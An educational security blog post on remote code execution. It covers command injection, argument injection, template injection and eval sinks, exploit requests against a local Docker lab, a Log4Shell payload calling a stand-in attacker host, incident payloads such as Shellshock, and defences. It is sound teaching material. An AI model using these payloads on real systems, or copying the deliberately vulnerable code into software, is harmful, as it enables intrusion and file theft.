TechEarl

Remote Code Execution (RCE): The Complete 2026 Practitioner Guide

Remote code execution explained from the sink level up. Command injection, argument injection past escapeshellarg, server-side template injection, and direct eval, with a Dockerised lab that reproduces each one, plus the defences that actually contain blast radius.

Ishan Karunaratne⏱️ 20 min readUpdated
Share thisCopied
Remote code execution attack chain through command injection

Remote code execution is the top of the impact pyramid. Every other web vulnerability class wants to reach RCE eventually, because once an attacker can run code on your host they are no longer attacking your application, they are attacking the machine. The application is just the door they walked through.

This article is the deep dive companion to the web application security vulnerabilities taxonomy. I cover what RCE is, walk the three primitives I see most often in code review (command injection, argument injection past escapeshellarg, and server-side template injection), cover direct eval() sinks as a bonus pattern, then run a working exploit against each one in a Dockerised lab. The defences come after, with the same depth.

What is remote code execution?

Remote code execution is a vulnerability where an attacker, communicating with the application over the network, gets the server to execute code or shell commands of the attacker's choosing. The "remote" qualifier separates it from local code execution, which assumes the attacker already has a shell or a user account on the box. RCE is the one where the attacker walks in from the internet.

The mechanism is always the same shape: untrusted bytes from the request cross a boundary into something that parses bytes as code. That something might be /bin/sh (command injection), a binary's own argument parser (argument injection), a template engine (SSTI), or the language's own runtime (eval, pickle.loads, Java deserialization). Different sinks, identical underlying mistake.

In the OWASP Top 10, RCE lives under A03 Injection alongside SQL injection and the other "untrusted input parsed as code" classes. CWE catalogues the most common forms separately: CWE-78 for OS command injection and CWE-94 for the broader "improper control of code generation" pattern. The CVE record covers everything from a 1996 fingerd bug to last quarter's Confluence advisory. The class is older than the web.

Why does every other bug aspire to RCE? Because RCE collapses the difference between application security and infrastructure security. An SQL injection lets an attacker read your database. An SSRF lets them ping your metadata service. An RCE lets them do both, plus install a backdoor, plus pivot to the database server, plus persist past your next deploy. RCE is what the incident response Slack channel looks like when the alert turns out to be real.

The three RCE primitives

Three sinks account for the vast majority of web-side RCEs I run into. Each one has a distinct vulnerable pattern and a distinct fix, but they share the same underlying confusion: data reached a code path.

Command injection through shell_exec and friends

The classic, the one every cheat sheet starts with. The application builds a shell command by concatenating user input, then hands the whole string to /bin/sh -c. The shell parses it before the target binary ever sees the argument, so shell metacharacters (;, |, &, backticks, $()) are interpreted as shell syntax, not as data.

Canonical vulnerable PHP:

php
$host = $_GET['host'];
$output = shell_exec("ping -c 1 -W 1 " . $host);

A normal request ?host=example.com runs ping -c 1 -W 1 example.com. An attacker request ?host=example.com;id runs ping -c 1 -W 1 example.com;id which the shell sees as two commands separated by a semicolon. The id command runs as the web user and its output ends up appended to the response.

Every language has the same family of footguns:

  • PHP: shell_exec, exec, passthru, system, backticks, popen, proc_open with bypass_shell=false.
  • Python: os.system, subprocess.run(..., shell=True), os.popen.
  • Node.js: child_process.exec, child_process.execSync. The safer siblings are execFile and spawn with an argv array.
  • Ruby: backticks, Kernel#system with a single string argument, %x{...}, IO.popen with a string.
  • Java: Runtime.exec(String) with a single string is shell-like in spirit (it tokenises naively); the array variant is safer but still vulnerable to argument injection (see next section).

The common factor is "single string handed to a shell". The fix is "pass arguments as arguments, never as a concatenated string".

Argument injection past escapeshellarg

This one bites people who think they fixed command injection. escapeshellarg (and its cousins shlex.quote, Node's shell-quote, Ruby's Shellwords.shellescape) correctly wraps the user input in quotes and escapes the shell metacharacters inside it, so ;, |, and $() cannot break out. The string the shell sees is one quoted argument. Good, that closes the shell-metacharacter hole.

What it does not solve is the called binary's own argument parser. If the user's value starts with a dash, most Unix tools interpret it as a flag, even when it is correctly shell-quoted. The shell hands one argument to the binary, the binary looks at the first character, sees -, and reads the rest as an option.

The canonical example, from the lab:

php
$domain = $_GET['domain'];
$output = shell_exec("dig " . escapeshellarg($domain));

A normal request ?domain=example.com runs dig 'example.com'. The single-quoted form is correct shell-wise. An attacker request ?domain=-f /etc/passwd runs dig '-f /etc/passwd'. The shell hands dig the literal argument -f /etc/passwd. dig looks at it, sees the leading dash, and parses -f as the batch-file flag. It opens /etc/passwd, reads each line as a DNS query, fails to parse it as a hostname, and dumps the file contents into its error output, which the web app passes back in the response.

dig -f is one example of a wide family:

  • curl -K <file>, curl -o <path> (overwrite anything), curl --upload-file.
  • find . -exec <cmd> {} ; (arbitrary command execution by design).
  • tar --use-compress-program=<cmd> (executes the program).
  • git --upload-pack=<cmd> and similar via clone of an attacker URL.
  • wget --use-askpass=<cmd>, wget -O <path>.
  • Even ssh -oProxyCommand=<cmd> is a classic in this family.

The fix at the call site is to refuse any user value that starts with -, or better, to pass -- before the user arguments so the binary stops looking for flags after that point: shell_exec("dig -- " . escapeshellarg($domain)). Even better, do not shell out at all. PHP has a perfectly good DNS resolver in the standard library; the same is true of every other language.

Server-side template injection

Template engines exist to mix static template text with dynamic values: Hello, {{ name }}. The intended use is that name is a string the engine reads from a context dictionary, looks up safely, and inserts into the output. Server-side template injection happens when the template itself comes from user input, not just the values inside it.

A hand-rolled mini engine in PHP makes this obvious:

php
function render($tpl) {
    return preg_replace_callback('/\{\{(.+?)\}\}/', function ($m) {
        return eval('return ' . trim($m[1]) . ';');
    }, $tpl);
}

echo render($_POST['tpl']);

The intent is {{ 2 + 2 }} becoming 4. The bug is that the engine evals whatever is between the braces, in the host language. The attacker submits {{ system("id") }} and gets command execution. Submits {{ file_get_contents("/etc/passwd") }} and gets the passwd file.

Real-world engines have the same shape with extra layers. Twig (PHP), Jinja2 (Python), Liquid (Ruby), Smarty (PHP), FreeMarker (Java), Velocity (Java), Thymeleaf (Java), and Handlebars (JavaScript) have all shipped SSTI CVEs. The 2015 PortSwigger SSTI research by James Kettle is the canonical writeup of how these engines expose the host runtime through {{ ... }}, ${...}, #set(), or whatever the engine's own evaluation syntax happens to be.

The Jinja2 textbook payload is {{ ''.__class__.__mro__[1].__subclasses__() }} which walks Python's class hierarchy to find a useful subclass like subprocess.Popen, then calls it. The Twig version uses _self and the engine's internal API to reach system. The FreeMarker version uses <#assign value="freemarker.template.utility.Execute"?new()>${value("id")}. The mechanics differ. The pattern is identical: user-controlled template text, evaluator does the rest.

The 99% of SSTI cases I see are not deliberately rendering attacker templates. They are sites that use template strings in places they should not, like:

  • Email subject and body templates editable from an admin UI that turned out to be reachable by lower-privilege users.
  • A CMS field that supports "shortcodes" with an evaluation backend.
  • An ORM .format() call where the developer thought string formatting and template rendering were the same thing.
  • Logging frameworks that interpolate context variables and ended up parsing the log message as a template. (See: Log4Shell, the next section.)

Direct eval() sinks

The dumbest version of the bug, and still very much shipped. The application takes a string from the request and hands it to the language's own evaluator. PHP eval, Python eval/exec, JavaScript eval/Function(), Ruby eval/instance_eval/class_eval, Perl eval STRING. Each is documented as "do not feed this user input", and each gets fed user input regularly.

The lab includes the laziest possible version:

php
$expr = $_POST['expr'];
echo eval("return $expr;");

This is a "calculator" endpoint that accepts arithmetic and evaluates it. The intended use is expr=2+2, returning 4. The exploit is expr=system("id"), returning the output of id. Or expr=file_get_contents("/etc/passwd"). There is no escape hatch, there is no nuance: any PHP expression the attacker writes runs.

The pattern shows up in real code most often as "let admins write a formula" features, plugin systems that evaluate config strings, rules engines for fraud or routing, or quick-and-dirty scriptable webhooks. The fix is to never use the language eval for user input. If you need a constrained expression evaluator, use an actual expression library with a defined grammar (asteval in Python, expr-eval in Node, cel-go for Go). Those parse the input as data, not as host-language code.

The Log4Shell case study

In December 2021 the security world lost a weekend to one of the most consequential RCEs of the decade. CVE-2021-44228, Log4Shell, scored CVSS 10.0, affected Apache Log4j 2 versions 2.0-beta9 through 2.15.0 (excluding security releases 2.3.1, 2.12.2, and 2.12.3), and turned every Java application that logged user-controlled strings into a remote-code-execution target. Apache shipped 2.15.0 as the initial fix on December 6, then 2.16.0 a few days later when the first fix turned out to be incomplete, then 2.17.0 and 2.17.1 over the next two weeks as related issues kept surfacing.

The mechanism is template-injection-shaped, even though Log4j is a logging library and not a template engine. Log4j 2 supports "lookups" in log messages: tokens like ${env:HOME} or ${java:version} in a log message get expanded at log time. One of the lookups is ${jndi:...}, which performs a JNDI lookup against the supplied URL. JNDI in turn supports LDAP, RMI, and other protocols. The LDAP path allows the response to specify a remote Java class to load and instantiate.

Putting that chain together: an attacker sends a request whose User-Agent header (or any other field the application logs) contains ${jndi:ldap://attacker.example/x}. The application logs the request. Log4j parses the log message, sees the lookup, performs the JNDI request, the LDAP server returns a reference to a remote class, the JVM downloads and instantiates the class, and the class's constructor runs whatever code the attacker chose. RCE through a log line.

The article-length lessons:

  1. Data reaches code through paths you did not design. Nobody wrote Log4j to be a remote class loader. The behaviour emerged from the composition of features that were each individually reasonable. Logging frameworks, ORM raw-query escape hatches, template helpers, image-processing format strings, and config-file evaluators are all places where data-by-intent quietly becomes code-by-implementation.
  2. Transitive blast radius is the real problem. Log4j is a dependency of half the Java ecosystem. Most teams scrambling on December 10, 2021 had never imported Log4j directly. They imported Spring, or Elasticsearch, or Solr, or Struts, which imported it transitively. The dependency graph is the attack surface.
  3. "Just upgrade" is a multi-week sentence in practice. Inventory of every running JAR. Identify which version of Log4j is on the classpath of each. Coordinate with vendors for closed-source apps. Roll out without breaking anything. Re-test after every patched release because 2.15.0 was incomplete, 2.16.0 had a denial-of-service issue, 2.17.0 had a smaller remote attack surface. The incident is a real-time case study in how dependency hygiene plays out under pressure.

Walking the lab

The rce-basic lab in the techearl-labs repo reproduces all four primitives above against a tiny PHP target.

bash
docker compose up rce-basic

The lab listens on http://localhost:8085. Treat the container as compromised the moment you start it; the README spells out the safety rules (do not bind-mount your home directory, do not change the loopback binding). What follows are the exact exploit paths.

1. Command injection: /ping.php

code
GET /ping.php?host=localhost;id

The constructed command is ping -c 1 -W 1 localhost;id, parsed by /bin/sh as two commands. The page returns the ping output followed by uid=33(www-data) gid=33(www-data) groups=33(www-data). The other separators work too: |id, `id`, $(id). Each one exploits a different shell metacharacter, all because the application built the command as a single string.

2. Argument injection: /lookup.php

code
GET /lookup.php?domain=-f /etc/passwd

escapeshellarg quotes the value correctly, so what dig receives is the argument -f /etc/passwd as a single token. dig parses it as the -f batch-file flag, opens /etc/passwd, fails to parse the lines as DNS queries, and dumps the file contents through its error output. The takeaway is the one I keep repeating: escapeshellarg solves shell parsing, not binary argument parsing.

3. SSTI: /template.php

code
POST /template.php
Content-Type: application/x-www-form-urlencoded

tpl={{ system("id") }}

The hand-rolled mini engine evals the expression between the braces. Anything PHP can express runs. Other useful payloads against the same endpoint:

code
tpl={{ file_get_contents("/etc/passwd") }}
tpl=hello {{ phpversion() }}

4. Direct eval: /calc.php

code
POST /calc.php
Content-Type: application/x-www-form-urlencoded

expr=system("id")

eval("return $expr;") runs whatever PHP expression you send. expr=phpversion() is a benign fingerprint; expr=file_get_contents("/etc/passwd") is the file-read variant; expr=`id` uses the PHP backtick operator, which is itself a shell_exec alias, so the chain is request -> eval -> shell.

Four endpoints, four sinks, four shapes of the same underlying mistake.

Modern defences

The defences below are listed in order of leverage, not order of difficulty. The high-leverage ones go first because they are the ones that actually close the class.

1. Do not shell out for things a library can do

This is the single highest-leverage defence. Most "I need to shell out" instincts come from familiarity, not necessity. If you find yourself building a dig command, your standard library has a DNS resolver. If you are building a curl command, you have an HTTP client. If you are calling convert to resize images, ImageMagick has a binding in your language and most languages also have a native image library. Shelling out is the slow, fragile, dangerous version of every one of those.

python
# Instead of:
subprocess.run(f"dig +short {hostname}", shell=True)

# Use:
import dns.resolver
answers = dns.resolver.resolve(hostname, "A")

The library version has no shell, no argv parsing, and no metacharacter problem. It is also faster (no fork/exec) and produces structured output you do not have to scrape.

2. When you must shell out, use an argv array and a strict allowlist

If shelling out is genuinely the only option (you are calling a tool with no library equivalent), pass the arguments as an array, never as a string, and validate every user-supplied value against a strict allowlist before it gets there.

python
import subprocess, re

if not re.fullmatch(r"[a-zA-Z0-9.-]+", hostname):
    raise ValueError("invalid hostname")
result = subprocess.run(
    ["dig", "+short", "--", hostname],
    capture_output=True, text=True, timeout=5,
)

Three things going on: the regex refuses any character outside the legal hostname set (no slashes, no spaces, no leading dash), the -- tells dig that everything after it is a positional argument and not a flag (the argument-injection defence from earlier), and the array form means no shell is involved, no metacharacter parsing ever happens.

The allowlist is the part most teams skimp on. A blocklist of "dangerous characters" gets bypassed every time. An allowlist of "characters this field is allowed to contain" does not.

3. Refuse user-controlled templates entirely

If your template engine has a "render a string" API (Jinja2's Environment.from_string, Twig's createTemplate, Handlebars' compile), grep your codebase for every call site and check whether the template string is ever user-controlled. If it is, that is your SSTI. Convert the call site to a file-loaded template with a parameterised context dictionary; the user supplies the dictionary, never the template.

Sandboxed template environments (Jinja2's SandboxedEnvironment, Twig's sandbox extension) are a partial defence at best. Every one of them has had bypasses. If you must render attacker-controlled templates, the sandbox is the third layer behind "do not do this" and "if you do it, isolate the worker that runs it from everything sensitive".

4. Run the process unprivileged and contain its blast radius

Code-level defences fail. Assume they will and shape the runtime so that a successful exploit gets the attacker as little as possible:

  • Drop privileges. The web process runs as a dedicated user (often www-data or an app-specific UID), never as root.
  • Container with no capabilities. Run with --cap-drop=ALL, add back only what the app needs (usually nothing). cap_net_bind_service for binding low ports is the common exception, and you can avoid even that with a reverse proxy.
  • Read-only root filesystem. Mount the container with --read-only and provide writable tmpfs mounts only for the paths the app legitimately writes to. A webshell needs to write itself somewhere; a read-only root makes that harder.
  • seccomp, AppArmor, or SELinux. A seccomp profile that blocks execve from the web process is a remarkable defence: even if the attacker gets code execution inside the language runtime, they cannot fork a shell. The default Docker seccomp profile is too permissive for this; a custom profile is the real win.
  • Egress filtering. The web container should not be able to make arbitrary outbound HTTP requests. Pin its egress to the specific upstream services it actually calls. That kills the Log4Shell-style "fetch a remote class" step in its tracks.
  • Network segmentation. The web container does not need to reach the database admin port, the secrets manager unencrypted, or the metadata service. IMDSv2 with required hop-limit is the modern AWS answer to SSRF-into-RCE chains.

None of these prevent the bug. They make the bug less useful when it happens. That is the right framing: defence in depth assumes one layer will be wrong on any given day.

5. Telemetry that catches exploitation

Bug bounty researchers and red teams are not the threat model that matters for most apps; it is opportunistic scanning. Make exploitation noisy:

  • Log every execve from the web user. There should not be many.
  • Alert on outbound connections from the web tier to anywhere other than the allow-listed upstreams. Log4Shell exploitation is, by its nature, an outbound LDAP/RMI request from the JVM. That call is visible at the network layer if you are looking.
  • Alert on unexpected child processes of the web server. nginx forking sh forking wget is the classic webshell shape.

Real-world incidents

The RCE history is too long for a single list. The five below are the ones I find most teachable.

Log4Shell, CVE-2021-44228 (December 2021)

Covered above. The lesson is "data reaches code through paths you did not design, and the dependency graph is the attack surface." CVSS 10.0, affected Log4j 2.0-beta9 through 2.14.1, fixed in a sequence of 2.15.0, 2.16.0, 2.17.0, 2.17.1 as related issues kept surfacing.

Shellshock, CVE-2014-6271 (September 2014)

Bash before 4.3 patch 25 mis-parsed function definitions in exported environment variables. If a variable's value started with () { ... }; <command>, Bash would parse the function, then execute the trailing command at shell startup. Combined with CGI, which exports HTTP headers as environment variables (e.g. HTTP_USER_AGENT), this turned any CGI-backed endpoint into an unauthenticated RCE: send a User-Agent of () { :; }; /usr/bin/id > /tmp/pwned and the server-side Bash invocation ran id. The class teaches what happens when "data" containers (env vars) get parsed as code (function definitions). The fix shipped within days; the cleanup took years because Bash was everywhere.

Spring4Shell, CVE-2022-22965 (March 30, 2022)

Spring Framework's data binding mechanism allowed setting nested properties on a target bean from request parameters. On JDK 9 and later, the class property of a bean exposed access to ClassLoader and, through a sequence of bean property writes, to the Tomcat access-log configuration. An attacker could rewrite the access log to a .jsp file in the web root, log a request whose payload was a JSP webshell, then hit the resulting file. Affected Spring Framework versions before 5.2.20 and 5.3.18, on JDK 9 or higher, deployed as WAR on Tomcat. The lesson is composition: each individual feature (data binding, classloader access, configurable log paths, JSP execution) was reasonable; combined they were RCE.

ImageTragick, CVE-2016-3714 (May 2016)

ImageMagick's image format handlers ran user-controllable strings through shell-out helpers (the "delegates" mechanism). A crafted file claiming to be an SVG or MVG could contain shell metacharacters in fields like url(...), and ImageMagick would invoke wget or similar with the attacker-controlled string concatenated in. Any web application that ran ImageMagick on uploaded images (so, most of them) was vulnerable. The class teaches that image-processing libraries are RCE sinks, not just CPU and memory sinks. The standard mitigation, beyond patching, was the policy.xml "remove dangerous coders" configuration that most teams still ship today.

Confluence OGNL injection, CVE-2022-26134 (June 2022)

Atlassian Confluence Server and Data Center before 7.4.17 (and several other branches) evaluated OGNL expressions inside the request URI. An attacker could send a request like /${@java.lang.Runtime@getRuntime().exec("id")}/ and Confluence would evaluate the expression as part of URL routing, executing the command. Unauthenticated, single-request RCE, exploited in the wild before the patch shipped. The class teaches that expression languages bolted onto routing or templating layers are RCE primitives waiting for an injection vector.

Frequently asked questions

Where to go next

This article is the spoke. For the working knowledge:

The recurring lesson across this whole family is the same one: every place untrusted input crosses into something that parses bytes as code is a sink, and the only reliable defence is to not let the crossing happen in the first place. Everything else is depth behind that.

Sources

Authoritative references this article was fact-checked against.

TagsRCERemote Code ExecutionCommand InjectionSSTIOWASPSecurity

Found this useful? Pass it on.

Copied

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.

Keep reading

Related posts